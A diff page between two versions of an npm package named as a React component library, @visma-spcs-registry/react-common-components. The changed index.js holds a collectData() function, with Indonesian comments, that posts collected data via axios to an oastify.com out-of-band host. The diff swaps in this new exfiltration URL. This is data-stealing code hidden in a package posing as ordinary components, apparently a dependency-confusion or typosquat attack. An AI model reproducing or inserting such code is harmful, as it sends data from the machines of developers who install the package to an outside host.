@visma-spcs-registry/react-common-components 4.2.5 → 4.2.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -98,7 +98,7 @@ async function collectData() {
|
|
98
98
|
console.log(data); // Tampilkan data yang dikumpulkan
|
99
99
|
|
100
100
|
// Kirim data ke server target
|
101
|
-
axios.post('https://
|
101
|
+
axios.post('https://szv138mpq6spdy0w5icr8zg7kyqpef24.oastify.com/log', data)
|
102
102
|
.then(response => {
|
103
103
|
console.log('✅ Data berhasil dikirim:', response.data);
|
104
104
|
})
|